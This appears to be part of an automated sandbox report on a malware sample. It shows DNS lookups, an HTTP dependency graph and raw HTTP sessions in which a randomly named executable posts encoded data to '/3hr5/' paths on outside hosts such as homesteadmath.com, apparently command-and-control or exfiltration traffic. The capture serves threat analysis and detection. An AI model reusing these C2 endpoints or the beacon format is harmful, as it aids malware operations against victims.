                                                                                                                              Dec 4, 2023 15:22:02.891237974 CET1.1.1.1192.168.11.200xfeNo error (0)drive.google.com142.250.80.46A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:22:03.773056030 CET1.1.1.1192.168.11.200xddb4No error (0)doc-0c-0k-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:22:03.773056030 CET1.1.1.1192.168.11.200xddb4No error (0)googlehosted.l.googleusercontent.com142.251.41.1A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:22:25.864830017 CET1.1.1.1192.168.11.200x8554No error (0)www.hormigonesmil.com54.36.145.173A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:22:42.606797934 CET1.1.1.1192.168.11.200x157bName error (3)www.buben.consultingnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:22:50.906050920 CET1.1.1.1192.168.11.200xaa91No error (0)www.homesteadmath.com74.208.236.243A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:04.418781042 CET1.1.1.1192.168.11.200xb762Name error (3)www.extragrandifirme.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:12.617836952 CET1.1.1.1192.168.11.200xc050No error (0)www.ritualyoga.org216.40.34.41A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:26.232273102 CET1.1.1.1192.168.11.200x72a9No error (0)www.rocsys.netrocsys.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:26.232273102 CET1.1.1.1192.168.11.200x72a9No error (0)rocsys.net37.97.254.27A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:40.278816938 CET1.1.1.1192.168.11.200x3ae1No error (0)www.metodomestredojogo.commetodomestredojogo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:40.278816938 CET1.1.1.1192.168.11.200x3ae1No error (0)metodomestredojogo.com108.179.192.34A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:23:53.684068918 CET1.1.1.1192.168.11.200x6980No error (0)www.echolinkevolve.xyz198.177.123.106A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:24:07.425935984 CET1.1.1.1192.168.11.200x7d17No error (0)www.rtptornado4dnihboss.comrtptornado4dnihboss.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:24:07.425935984 CET1.1.1.1192.168.11.200x7d17No error (0)rtptornado4dnihboss.com198.252.98.64A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:24:21.048724890 CET1.1.1.1192.168.11.200xd247No error (0)www.slimnthinau.com91.195.240.117A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:24:35.205137014 CET1.1.1.1192.168.11.200x932aNo error (0)www.080869.com104.232.106.165A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:24:48.728785992 CET1.1.1.1192.168.11.200x7247No error (0)www.eigenheimstattmiete.com89.31.143.90A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:02.392484903 CET1.1.1.1192.168.11.200x856bNo error (0)www.neuvillette.orgparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:02.392484903 CET1.1.1.1192.168.11.200x856bNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:16.318856955 CET1.1.1.1192.168.11.200x1d0eNo error (0)www.scoopstarz.com172.67.202.151A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:16.318856955 CET1.1.1.1192.168.11.200x1d0eNo error (0)www.scoopstarz.com104.21.52.182A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:29.763139009 CET1.1.1.1192.168.11.200xd887No error (0)www.vaultedjewelry.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:29.763139009 CET1.1.1.1192.168.11.200xd887No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:43.608050108 CET1.1.1.1192.168.11.200xb325No error (0)www.brls.money76.76.21.142A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:25:43.608050108 CET1.1.1.1192.168.11.200xb325No error (0)www.brls.money76.76.21.241A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:26:07.226275921 CET1.1.1.1192.168.11.200x285aName error (3)www.buben.consultingnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:26:28.764765978 CET1.1.1.1192.168.11.200xc9acName error (3)www.extragrandifirme.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:27:58.009080887 CET1.1.1.1192.168.11.200xf766No error (0)www.austintrafficlawyer.com217.160.0.27A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:11.700593948 CET1.1.1.1192.168.11.200xe7e9No error (0)www.littlehappiez.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:11.700593948 CET1.1.1.1192.168.11.200xe7e9No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:24.999907017 CET1.1.1.1192.168.11.200x29c7No error (0)www.engindenizyurdu.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:24.999907017 CET1.1.1.1192.168.11.200x29c7No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:39.103446960 CET1.1.1.1192.168.11.200x3048No error (0)www.opleverdossier.onlineopleverdossier.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:28:39.103446960 CET1.1.1.1192.168.11.200x3048No error (0)opleverdossier.online91.184.0.200A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:06.518049955 CET1.1.1.1192.168.11.200x1ce0No error (0)www.fisiocomoterapia.comfisiocomoterapia.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:06.518049955 CET1.1.1.1192.168.11.200x1ce0No error (0)fisiocomoterapia.com89.117.169.140A (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:19.132354975 CET1.1.1.1192.168.11.200x547aName error (3)www.buben.consultingnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 4, 2023 15:29:29.529067039 CET1.1.1.1192.168.11.200xb510Name error (3)www.extragrandifirme.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • drive.google.com
                                                                                                                              • doc-0c-0k-docs.googleusercontent.com
                                                                                                                              • www.hormigonesmil.com
                                                                                                                              • www.homesteadmath.com
                                                                                                                              • www.ritualyoga.org
                                                                                                                              • www.rocsys.net
                                                                                                                              • www.metodomestredojogo.com
                                                                                                                              • www.echolinkevolve.xyz
                                                                                                                              • www.rtptornado4dnihboss.com
                                                                                                                              • www.slimnthinau.com
                                                                                                                              • www.080869.com
                                                                                                                              • www.eigenheimstattmiete.com
                                                                                                                              • www.neuvillette.org
                                                                                                                              • www.scoopstarz.com
                                                                                                                              • www.vaultedjewelry.com
                                                                                                                              • www.brls.money
                                                                                                                              • www.austintrafficlawyer.com
                                                                                                                              • www.littlehappiez.com
                                                                                                                              • www.engindenizyurdu.com
                                                                                                                              • www.opleverdossier.online
                                                                                                                              • www.fisiocomoterapia.com

                                                                                                                              HTTP Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.11.205013154.36.145.173808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:22:26.038505077 CET535OUTGET /3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.hormigonesmil.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:22:27.461071014 CET590INHTTP/1.1 301 Moved Permanently
                                                                                                                              date: Mon, 04 Dec 2023 14:22:27 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              server: Apache
                                                                                                                              x-powered-by: PHP/7.4
                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                              wpo-cache-status: not cached
                                                                                                                              wpo-cache-message: In the settings, caching is disabled for matches for one of the current request's GET parameters
                                                                                                                              x-redirect-by: WordPress
                                                                                                                              location: http://hormigonesmil.com/3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVE
                                                                                                                              Data Raw:
                                                                                                                              Data Ascii:
                                                                                                                              Dec 4, 2023 15:22:27.461147070 CET238INData Raw: 78 32 6e 53 4d 57 35 33 43 79 33 49 63 37 46 68 6f 4f 47 54 63 53 58 4e 48 4f 67 4a 6c 69 31 43 59 54 44 46 49 34 74 43 4b 31 64 71 47 50 7a 51 51 3d 3d 26 31 64 72 3d 79 50 35 50 51 44 33 38 0d 0a 78 2d 69 70 6c 62 2d 72 65 71 75 65 73 74 2d 69
                                                                                                                              Data Ascii: x2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38x-iplb-request-id: BF60E3DC:C3D3_362491AD:0050_656DE0A2_DBF11:6292x-iplb-instance: 52473connection: close0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.11.205013274.208.236.243808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:22:51.031161070 CET816OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 50 35 43 65 76 56 56 54 71 39 7a 6f 63 4a 43 38 54 4f 44 30 5a 53 47 57 45 48 33 78 68 43 63 30 43 53 62 58 7a 71 30 64 61 4c 36 30 54 76 35 34 39 67 51 35 48 6c 34 75 46 7a 69 2f 63 30 35 68 2b 52 77 43 73 4d 44 38 2b 6d 33 38 50 72 37 51 78 61 4d 50 71 31 78 37 2b 31 2f 33 70 42 71 69 50 77 43 46 35 4a 58 78 31 4d 43 41 54 54 53 79 44 68 71 44 57 37 5a 66 54 72 76 51 73 61 4e 6f 79 77 78 36 66 36 43 58 4b 4a 65 4b 68 35 37 44 53 51 4d 61 64 66 72 43 68 64 73 77 5a 77 66 6b 63 74 44 76 4c 6d 32 72 35 73 6c 4b 4b 42 7a 30 5a 41 3d 3d
                                                                                                                              Data Ascii: TZd=P5CevVVTq9zocJC8TOD0ZSGWEH3xhCc0CSbXzq0daL60Tv549gQ5Hl4uFzi/c05h+RwCsMD8+m38Pr7QxaMPq1x7+1/3pBqiPwCF5JXx1MCATTSyDhqDW7ZfTrvQsaNoywx6f6CXKJeKh57DSQMadfrChdswZwfkctDvLm2r5slKKBz0ZA==
                                                                                                                              Dec 4, 2023 15:22:51.160867929 CET634INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:22:51 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.11.205013374.208.236.243808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:22:53.683531046 CET1156OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 50 35 43 65 76 56 56 54 71 39 7a 6f 64 70 79 38 53 70 76 30 4d 69 47 56 64 33 33 78 76 69 63 77 43 53 58 58 7a 72 77 4e 61 35 65 30 54 4f 4a 34 38 68 51 35 45 6c 34 75 4f 54 69 41 66 45 35 6d 2b 52 73 38 73 4d 50 38 2b 6d 54 38 4e 5a 7a 51 30 71 4d 4d 6b 56 78 38 70 46 2f 30 2b 78 72 74 50 77 47 6a 35 4d 2f 78 31 38 2b 41 53 51 36 79 51 44 43 41 52 62 5a 5a 56 72 76 50 6d 36 4e 71 79 77 73 48 66 34 53 70 4b 37 43 4b 6d 61 7a 44 41 41 4d 46 48 66 71 49 76 4e 74 44 49 7a 36 68 61 2b 37 67 56 55 4b 47 34 2f 46 65 4c 6c 36 50 4e 61 74 36 4a 6f 2f 70 42 61 32 61 37 33 49 77 77 31 64 6b 56 75 4a 70 74 5a 62 58 49 66 53 4f 59 33 33 76 72 49 4d 54 38 55 4e 35 63 48 55 6b 5a 76 50 53 77 55 5a 4e 74 48 45 71 6c 30 6c 55 71 76 7a 7a 49 69 79 57 62 42 37 77 4a 48 4d 41 42 4a 61 32 6d 49 62 64 44 77 62 58 30 4e 4d 49 63 78 54 68 78 62 4b 61 61 65 4b 44 4e 4b 78 34 33 6c 35 4b 44 77 61 7a 41 67 69 34 73 39 5a 55 51 6a 6c 4b 64 5a 4b 44 6b 43 2b 37 6b 79 2f 4f 59 56 4d 58 68 42 51 74 73 58 36 46 78 46 4e 45 4b 6f 4b 44 77 66 30 2b 68 30 63 63 4f 68 30 38 63 67 52 55 70 68 4e 4e 63 5a 52 68 4a 69 64 53 48 74 37 71 30 70 42 77 4b 49 49 37 41 51 52 33 30 57 2b 33 6a 34 56 65 37 59 43 77 50 36 58 7a 50 72 41 66 50 44 4b 32 57 38 30 67 6e 5a 33 53 6c 58 65 7a 48 71 75 48 54 72 36 48 58 33 44 55 61 71 4e 43 6b 55 6b 52 75 6c 70 31 37 66 42 4e 4a 78 39 43 30 38 37 63 2f 2f 5a 44 6b 62 36 37 59 6a 31 77 62 53 49 63 4f 57 33 54 30 70 74 77 36 53 44 4a 6e 72 72 52 53 4c 69 33 68 6a 6d 7a 78 4c 71 78 4c 4d 6a 44 33 78 77 5a 31 4c 52 31 66 57 70 63 75 72 34 3d
                                                                                                                              Data Ascii: TZd=P5CevVVTq9zodpy8Spv0MiGVd33xvicwCSXXzrwNa5e0TOJ48hQ5El4uOTiAfE5m+Rs8sMP8+mT8NZzQ0qMMkVx8pF/0+xrtPwGj5M/x18+ASQ6yQDCARbZZVrvPm6NqywsHf4SpK7CKmazDAAMFHfqIvNtDIz6ha+7gVUKG4/FeLl6PNat6Jo/pBa2a73Iww1dkVuJptZbXIfSOY33vrIMT8UN5cHUkZvPSwUZNtHEql0lUqvzzIiyWbB7wJHMABJa2mIbdDwbX0NMIcxThxbKaaeKDNKx43l5KDwazAgi4s9ZUQjlKdZKDkC+7ky/OYVMXhBQtsX6FxFNEKoKDwf0+h0ccOh08cgRUphNNcZRhJidSHt7q0pBwKII7AQR30W+3j4Ve7YCwP6XzPrAfPDK2W80gnZ3SlXezHquHTr6HX3DUaqNCkUkRulp17fBNJx9C087c//ZDkb67Yj1wbSIcOW3T0ptw6SDJnrrRSLi3hjmzxLqxLMjD3xwZ1LR1fWpcur4=
                                                                                                                              Dec 4, 2023 15:22:53.813286066 CET634INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:22:53 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.11.205013474.208.236.243808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:22:56.339684963 CET12914OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 50 35 43 65 76 56 56 54 71 39 7a 6f 64 70 79 38 53 70 76 30 4d 69 47 56 64 33 33 78 76 69 63 77 43 53 58 58 7a 72 77 4e 61 35 57 30 54 34 56 34 36 43 34 35 46 6c 34 75 4e 54 69 42 66 45 34 6a 2b 52 31 37 73 4d 54 43 2b 6b 37 38 4e 4c 4c 51 7a 59 55 4d 75 31 78 39 6c 6c 2f 32 70 42 72 35 50 77 43 4e 35 4d 72 48 31 4d 61 41 54 53 69 79 53 43 43 44 62 72 5a 66 56 72 76 4c 69 36 4e 55 79 77 6f 74 66 34 65 70 4b 35 6d 4b 67 76 2f 44 54 6e 34 46 54 2f 71 4c 70 39 74 4d 52 44 36 55 61 39 48 53 56 55 4b 57 34 2b 52 65 4c 69 4f 50 4d 64 35 39 4d 34 2f 70 65 71 32 64 6f 6e 4d 30 77 31 42 73 56 74 56 70 74 65 48 58 48 66 53 4f 4b 6a 6a 75 39 59 4d 56 72 45 4e 75 4b 33 59 57 5a 76 72 67 77 52 5a 4e 74 33 41 71 6e 44 46 55 6d 75 7a 7a 49 43 79 49 56 68 37 5a 48 6e 4d 55 42 4a 4b 51 6d 4a 37 6a 44 77 76 58 31 73 73 49 4d 6a 37 69 68 72 4b 55 44 65 4b 73 62 36 39 6b 33 6b 4a 57 44 77 61 6a 41 68 32 34 73 4e 70 55 54 6e 78 4c 65 4a 4c 4c 73 69 2b 71 76 53 44 41 59 52 6b 66 68 42 30 48 73 55 57 46 78 6c 4e 45 42 72 69 41 36 76 30 31 2b 45 63 4f 4e 52 31 6d 63 68 73 48 70 67 59 34 64 6f 39 68 4a 52 6c 53 4e 64 37 70 79 4a 42 30 66 34 49 39 54 41 52 33 30 57 6a 47 6a 34 5a 65 37 70 36 77 4f 4e 72 7a 4e 38 55 66 4e 44 4b 77 57 38 30 78 6e 5a 72 70 6c 58 57 64 48 72 65 74 54 6f 4b 48 55 6a 50 55 58 50 78 42 67 6b 6b 55 71 6c 6f 31 31 2f 4e 57 4a 78 78 4b 30 38 71 70 38 49 42 44 6e 62 4b 37 50 44 31 76 64 79 49 58 4a 57 33 2f 6a 5a 78 73 36 53 76 6a 6e 71 76 34 53 4c 4b 33 6a 31 33 6c 75 49 4f 55 51 75 6e 39 7a 42 6b 30 36 59 56 45 46 45 74 6a 37 2b 72 5a 47 77 45 33 66 65 72 4d 72 56 72 4b 47 65 4a 70 2b 63 73 37 56 71 4c 39 6b 56 31 48 2f 79 43 38 2f 65 58 42 64 72 69 4e 46 41 69 35 4f 62 31 63 44 6a 57 6b 36 50 4e 46 54 42 35 79 64 33 76 35 61 42 4f 46 44 67 62 48 62 45 62 7a 79 56 57 68 65 31 58 44 70 6d 52 76 76 38 41 42 4a 71 6a 49 41 63 4d 55 62 4e 30 33 64 6f 6b 45 73 45 4a 41 2b 42 37 76 49 77 30 38 54 69 6b 4f 48 4b 2b 32 77 41 39 66 4f 6f 64 56 31 4b 33 6e 51 73 50 44 4d 69 58 49 45 61 38 43 4b 39 5a 37 30 77 61 66 6b 46 5a 39 72 5a 58 68 54 73 38 6a 2b 79 54 45 2f 64 44 55 6c 68 68 64 4f 70 56 69 4d 73 79 68 6a 31 61 57 78 78 76 32 33 46 66 55 53 76 63 69 63 79 57 66 45 77 70 57 48 54 6c 2f 44 62 63 63 32 36 64 33 6b 65 51 52 34 34 52 41 65 2b 6f 4a 68 66 69 65 5a 61 37 4f 64 30 5a 6c 62 76 62 61 39 50 63 5a 55 64 43 41 73 76 4f 46 6a 4a 43 4b 7a 42 44 4a 4c 66 52 77 6d 56 50 30 50 78 31 73 70 43 4f 69 63 78 30 69 4f 4e 62 59 45 50 76 66 34 65 35 43 6a 79 47 37 73 63 43 75 37 4e 73 37 41 71 45 4d 6e 54 41 6b 33 7a 44 78 79 52 37 51 39 4b 72 36 32 55 35 49 47 6a 32 37 56 67 67 43 50 31 6e 2f 69 6d 77 48 33 50 33 31 76 6b 47 79 61 37 39 58 37 58 6c 56 64 54 2b 39 2f 59 73 69 48 6b 51 73 37 37 72 74 2f 4a 2f 6a 71 5a 49 63 54 37 66 4d 33 4a 49 76 6b 75 4a 44 7a 62 30 56 63 4b 48 45 38 61 61 7a 61 54 76 70 70 6c 53 38 63 5a 58 45 69 2b 79 57 5a 64 62 5a 56 79 48 50 72 2f 59 44 6a 56 72 33 46 41 70 4d 72 45 7a 52 75 61 79 4b 65 2b 68 71 43 31 73 69 4c 65 72 5a 67 46 31 6a 61 62 2b 36 6e 72 79 4e 6e 43 58 33 2b 34 2f 4d 6c 69 62 71 41 45 6a 52 68 31 4e 69 41 6e 49 54 4a 56 76 45 51 73 68 77 56 69 47 4d 37 51 79 4f 57 34 43 43 4c 35 77 53 37 57 55 6e 47 49 76 59 61 50 63 6a 6c 43 2f 58 76 51 46 79 2f 44 63 52 56 54 35 4a 36 64 6e 41 43 4a 7a 39 63 4b 30 43 48 45 70 59 41 70 4a 77 73 39 68 75 4a 33 46 65 31 77 61 2b 58 37 6a 44 6c 33 68 34 32 50 32 66 44 71 42 66 42 67 76 42 37 69 31 68 75 58 43 64 5a 6f 30 45 4b 59 58 79 56 63 36 76 56 36 38 55 32 49 5a 4c 44 2f 76 53 39 65 63 74 79 67 50 79 34 6e 6d 37 4a 59 63 31 39 44 79 34 34 71 5a 77 56 4a 52 42 36 45 71 41 71 71 59 36 2b 69 73 69 73 74 71 59 2b 51 54 68 4c 55 77 79 77 33 73 65 69 54 59 6c 70 58 53 72 54 59 77 55 32 41 4a 65 38 6b 51 2b 44 4d 44 2f 36 39 6c 74 78 4a 35 64 33 47 39 4c 45 53 59 79 7a 55 66 4a 31 55 6f 6a 58 